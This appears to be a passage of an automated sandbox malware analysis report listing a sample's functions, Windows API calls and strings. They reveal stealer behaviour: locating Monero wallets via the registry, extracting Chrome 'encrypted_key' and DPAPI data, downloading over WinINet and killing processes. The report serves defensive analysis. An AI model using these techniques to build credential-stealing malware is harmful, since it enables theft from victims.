                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                    • API String ID: 3225020163-4244082812
                                    • Opcode ID: 9a2232cd1e1b4f9d1a1d18ffa7148c836af5b4fc0dc30073df57b6ecda30367e
                                    • Instruction ID: 47b706f6cd3b286e867e451dcc07ce6a1398caa0beb4975a9c62fc52d392e2e5
                                    • Opcode Fuzzy Hash: 9a2232cd1e1b4f9d1a1d18ffa7148c836af5b4fc0dc30073df57b6ecda30367e
                                    • Instruction Fuzzy Hash: F8F09675A4030DBBE7149BE19C4EFEA7B7CEB04715F000064FF25E2284D670598497A2
                                    Function 00F69DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memcmp.MSVCRT(?,v20,00000003), ref: 00F69E04
                                    • memcmp.MSVCRT(?,v10,00000003), ref: 00F69E42
                                    • LocalAlloc.KERNEL32(00000040), ref: 00F69EA7
                                      • Part of subcall function 00F871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00F871FE
                                    • lstrcpy.KERNEL32(00000000,00F94C48), ref: 00F69FB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpymemcmp$AllocLocal
                                    • String ID: @$v10$v20
                                    • API String ID: 102826412-278772428
                                    • Opcode ID: 92846d87eea2b0606e9faeb070bcec444182d0659f655c239c049e93aaa2056a
                                    • Instruction ID: 5838353808ca09cf9d60d6af677d92514fd2c262bb7aebd20e3ca16a7e527a8b
                                    • Opcode Fuzzy Hash: 92846d87eea2b0606e9faeb070bcec444182d0659f655c239c049e93aaa2056a
                                    • Instruction Fuzzy Hash: A651A231A152099BDB20EFA4DC85BDE77A8EF50324F194024F919EB241DBB8ED45ABD0
                                    Function 00F65640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F6565A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F65661
                                    • InternetOpenA.WININET(00F8CFEC,00000000,00000000,00000000,00000000), ref: 00F65677
                                    • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00F65692
                                    • InternetReadFile.WININET(?,?,00000400,00000001), ref: 00F656BC
                                    • memcpy.MSVCRT(00000000,?,00000001), ref: 00F656E1
                                    • InternetCloseHandle.WININET(?), ref: 00F656FA
                                    • InternetCloseHandle.WININET(00000000), ref: 00F65701
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                    • String ID:
                                    • API String ID: 1008454911-0
                                    • Opcode ID: 29cb1984c9bd9c9b1e27446d47f1b65082fcd5b385a00225f0099a9468fb050f
                                    • Instruction ID: 77c9a7ec078f0e46fb5f842dcb49182fbc81f6258561a07296556f96115d2df5
                                    • Opcode Fuzzy Hash: 29cb1984c9bd9c9b1e27446d47f1b65082fcd5b385a00225f0099a9468fb050f
                                    • Instruction Fuzzy Hash: 4741A370E00208DFDB24CF55D844F9AB7B4FF48714F14806DEA28AB295E3719981CF95
                                    Function 00F84740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00F84759
                                    • Process32First.KERNEL32(00000000,00000128), ref: 00F84769
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00F8477B
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F8479C
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F847AB
                                    • CloseHandle.KERNEL32(00000000), ref: 00F847B2
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00F847C0
                                    • CloseHandle.KERNEL32(00000000), ref: 00F847CB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 3836391474-0
                                    • Opcode ID: 41da5dfef691c4241b858fe5791038ef58eaca2c7c27d4a31a71a3e41f6efc20
                                    • Instruction ID: e23e26b61fb5230eae21fce31e0ffd10f16a0c872d071ad130bf46571b6ff5a0
                                    • Opcode Fuzzy Hash: 41da5dfef691c4241b858fe5791038ef58eaca2c7c27d4a31a71a3e41f6efc20
                                    • Instruction Fuzzy Hash: 69019271A01219ABE7346A709C8DFEE77BCEB09B65F0401A4FA25D1084EB749DC08B61
                                    Function 00F783E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 00F78435
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7846C
                                    • lstrlen.KERNEL32(00000000), ref: 00F784B2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F784E9
                                    • lstrlen.KERNEL32(00000000), ref: 00F784FF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7852E
                                    • StrCmpCA.SHLWAPI(00000000,00F94C3C), ref: 00F7853E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: bf1e5ecd82c37643c31345b74d7352b6dc1abc778f7ab171711ece6a68f2d7ff
                                    • Instruction ID: 05f9a8b28082696fcae368c509546759ba726176fd37659ced0393f204afbe2d
                                    • Opcode Fuzzy Hash: bf1e5ecd82c37643c31345b74d7352b6dc1abc778f7ab171711ece6a68f2d7ff
                                    • Instruction Fuzzy Hash: C051C471A402058FCB24DF64D888A5BB7F9EF48760F18C42EEC59DB205EB34E942DB51
                                    Function 00F82910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00F82925
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F8292C
                                    • RegOpenKeyExA.ADVAPI32(80000002,00A8C128,00000000,00020119,00F828A9), ref: 00F8294B
                                    • RegQueryValueExA.ADVAPI32(00F828A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00F82965
                                    • RegCloseKey.ADVAPI32(00F828A9), ref: 00F8296F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: eeca2870e0071e07caa7d6b93a545ebf31f8f13bbc442d4144559816c44bc3b5
                                    • Instruction ID: 3a262298381d2a284ed30de948e16c48480a5921bede311352136ae27eb9a6cd
                                    • Opcode Fuzzy Hash: eeca2870e0071e07caa7d6b93a545ebf31f8f13bbc442d4144559816c44bc3b5
                                    • Instruction Fuzzy Hash: 87012F75A00318ABE324DBA0DC59EFB7BBCEB09715F1400A8FE65DB244E631694487A0
                                    Function 00F82880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00F82895
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F8289C
                                      • Part of subcall function 00F82910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00F82925
                                      • Part of subcall function 00F82910: RtlAllocateHeap.NTDLL(00000000), ref: 00F8292C
                                      • Part of subcall function 00F82910: RegOpenKeyExA.ADVAPI32(80000002,00A8C128,00000000,00020119,00F828A9), ref: 00F8294B
                                      • Part of subcall function 00F82910: RegQueryValueExA.ADVAPI32(00F828A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00F82965
                                      • Part of subcall function 00F82910: RegCloseKey.ADVAPI32(00F828A9), ref: 00F8296F
                                    • RegOpenKeyExA.ADVAPI32(80000002,00A8C128,00000000,00020119,00F79500), ref: 00F828D1
                                    • RegQueryValueExA.ADVAPI32(00F79500,00A9E1D8,00000000,00000000,00000000,000000FF), ref: 00F828EC
                                    • RegCloseKey.ADVAPI32(00F79500), ref: 00F828F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: 4d2c05ebd71f584808c452a6569f0e5c02f733bee9c789bf04d22f32344bbdd4
                                    • Instruction ID: f8281c8185b6d9b83af6d01810587d45fbfb748ece7019f8d8417af195ba6f1a
                                    • Opcode Fuzzy Hash: 4d2c05ebd71f584808c452a6569f0e5c02f733bee9c789bf04d22f32344bbdd4
                                    • Instruction Fuzzy Hash: 7301A271A0020CBBEB28ABA4AC4AEEA776CEB44715F000169FE28D6244D6715A8497A1
                                    Function 00F671F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 00F6723E
                                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00F67279
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F67280
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00F672C3
                                    • HeapFree.KERNEL32(00000000), ref: 00F672CA
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00F67329
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                    • String ID:
                                    • API String ID: 174687898-0
                                    • Opcode ID: c0f02737c72a731384b75a0a975f4ffa72045892df74aac0e9407d2c760d8f0c
                                    • Instruction ID: 90348c7295444ccc9eb89a5386daae7bd2391c69111acd788ddf26b6be5dba58
                                    • Opcode Fuzzy Hash: c0f02737c72a731384b75a0a975f4ffa72045892df74aac0e9407d2c760d8f0c
                                    • Instruction Fuzzy Hash: 46417E71B047059BEB20DF69D885BAAB3E8FB88319F1445A9EC5DC7300E631E940AB50
                                    Function 00F69C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 00F69CA8
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00F69CDA
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F69D03
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocLocallstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2746078483-738592651
                                    • Opcode ID: 697f364d18750e0bc93161ac53f03c29906cc081b5dbab4e1c070c26030e032e
                                    • Instruction ID: 2b5accd3c0b6b08d43d35312538f2b1ccec2a6503a5e751a7114b799440a8a4a
                                    • Opcode Fuzzy Hash: 697f364d18750e0bc93161ac53f03c29906cc081b5dbab4e1c070c26030e032e
                                    • Instruction Fuzzy Hash: 8841BE31E052099BDF21EFA4DE41AAEB7B8EF94314F084078E955A7342DBB4ED01E780
                                    Function 00F7E9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00F7EA24
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7EA53
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7EA61
                                    • lstrcat.KERNEL32(?,00F91794), ref: 00F7EA7A
                                    • lstrcat.KERNEL32(?,00A992A8), ref: 00F7EA8D
                                    • lstrcat.KERNEL32(?,00F91794), ref: 00F7EA9F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
